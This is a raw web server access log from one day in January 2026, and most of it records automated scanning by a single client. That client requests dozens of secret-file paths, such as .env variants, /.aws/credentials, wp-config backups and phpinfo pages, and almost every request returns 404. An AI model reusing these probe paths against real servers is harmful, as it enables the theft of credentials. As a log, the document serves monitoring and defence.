[Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[16/Jan/2026:13:51:05 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.156.192] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:13:51:32 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:13:52:05 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:14:16:20 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:14:23:47 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:24:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" "-" +[16/Jan/2026:14:29:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.148.10.247] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:29:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.148.10.247] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:29:00 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.148.10.247] [Length 154] [Gzip -] "-" "-" +[16/Jan/2026:14:29:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.148.10.247] [Length 1033] [Gzip -] "-" "-" +[16/Jan/2026:14:29:00 +0000] 200 - GET http 92.249.249.197 "/" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/portal/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:00 +0000] 404 - GET http 92.249.249.197 "/env/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/app/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/dev/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/new/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/new/.env.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/new/.env.production" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/new/.env.staging" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/_phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/_profiler/phpinfo/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/wp-config" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/aws-secret.yaml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/awstats/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:01 +0000] 404 - GET http 92.249.249.197 "/conf/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/cron/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/www/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/docker/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/docker/app/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/env.backup" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/xampp/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/lara/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/lara/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/laravel/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/.vscode/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/js/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/laravel/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/laravel/core/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/mail/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/mailer/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:02 +0000] 404 - GET http 92.249.249.197 "/nginx/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/public/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/site/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/xampp/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/main/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/node_modules/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/kyc/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/prod/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/.env.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/api/shared/config/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/api/shared/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/website/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/development/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/api/shared/config/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:03 +0000] 404 - GET http 92.249.249.197 "/api/shared/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/api/config.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/service/email_service.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/node/.env_example" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env.production.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env.local" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env.stage" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 400 - GET http 92.249.249.197 "/server/config/database.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env.old" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:04 +0000] 404 - GET http 92.249.249.197 "/.env_sample" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 400 - GET http 92.249.249.197 "/scripts/nodemailer.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/.env.prod" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/crm/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/local/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/core/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/apps/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/application/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/web/.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/.aws/credentials" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/wp-config.php.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:05 +0000] 404 - GET http 92.249.249.197 "/dashboard/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:06 +0000] 400 - GET http 92.249.249.197 "/static/js/main.141b0494.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:06 +0000] 400 - GET http 92.249.249.197 "/static/js/2.ca066a4b.chunk.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:07 +0000] 400 - GET http 92.249.249.197 "/static/js/main.e85f7a37.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/admin/server_info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/server_info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/test.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/server-info" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/server-info.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:07 +0000] 404 - GET http 92.249.249.197 "/secured/phpinfo.php" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:08 +0000] 400 - GET http 92.249.249.197 "/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:08 +0000] 400 - GET http 92.249.249.197 "/server.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:09 +0000] 404 - GET http 92.249.249.197 "/appsettings.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:09 +0000] 400 - GET http 92.249.249.197 "/shared/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:10 +0000] 404 - GET http 92.249.249.197 "/config/aws.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:10 +0000] 404 - GET http 92.249.249.197 "/settings.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:10 +0000] 404 - GET http 92.249.249.197 "/config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:10 +0000] 400 - GET http 92.249.249.197 "/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:11 +0000] 400 - GET http 92.249.249.197 "/config/constants.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:12 +0000] 404 - GET http 92.249.249.197 "/application.properties" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:12 +0000] 400 - GET http 92.249.249.197 "/public/js/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:13 +0000] 400 - GET http 92.249.249.197 "/js/main.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:13 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=1" [Client 45.148.10.247] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:13 +0000] 404 - GET http 92.249.249.197 "/storage/logs/laravel.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:13 +0000] 404 - GET http 92.249.249.197 "/karma.conf.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:13 +0000] 404 - GET http 92.249.249.197 "/swagger.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:14 +0000] 400 - GET http 92.249.249.197 "/swagger.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:14 +0000] 400 - GET http 92.249.249.197 "/gatsby-config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:15 +0000] 404 - GET http 92.249.249.197 "/backend/config/default.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:22 +0000] 404 - GET http 92.249.249.197 "/app.py" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:22 +0000] 400 - GET http 92.249.249.197 "/admin/controllers/merchant.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:23 +0000] 400 - GET http 92.249.249.197 "/admin/controllers/partner.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:23 +0000] 400 - GET http 92.249.249.197 "/api/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:28 +0000] 404 - GET http 92.249.249.197 "/api/objects/codes.php.save" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:29 +0000] 400 - GET http 92.249.249.197 "/apis/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:29 +0000] 400 - GET http 92.249.249.197 "/apis/controllers/users.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:32 +0000] 400 - GET http 92.249.249.197 "/app.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[16/Jan/2026:14:29:32 +0000] 404 - GET http 92.249.249.197 "/backend/config/development.yml" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[16/Jan/2026:14:29:33 +0000] 400 - GET http 92.249.249.197 "/cloud/Scraper.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" 